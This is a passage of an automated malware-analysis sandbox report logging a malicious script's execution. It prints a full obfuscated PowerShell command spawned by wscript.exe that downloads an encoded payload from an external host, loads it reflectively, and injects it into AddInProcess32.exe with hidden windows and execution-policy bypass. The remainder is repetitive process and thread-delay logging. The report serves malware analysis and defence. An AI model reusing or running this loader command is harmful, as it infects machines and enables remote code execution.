Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFE7E4300BD pushad ; iretd 2_2_00007FFE7E4300C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFE7E4500BD pushad ; iretd 6_2_00007FFE7E4500C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFE7E525059 push ebp; iretd 6_2_00007FFE7E525060
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1907Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1451Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4334Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5316Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 4636Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 4862Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: foregroundWindowGot 1764Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep count: 4334 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep count: 5316 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8056Thread sleep count: 245 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8056Thread sleep time: -122500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8060Thread sleep count: 4636 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8060Thread sleep time: -13908000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8060Thread sleep count: 4862 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8060Thread sleep time: -14586000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000006.00000002.1416363718.00000208FB6C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 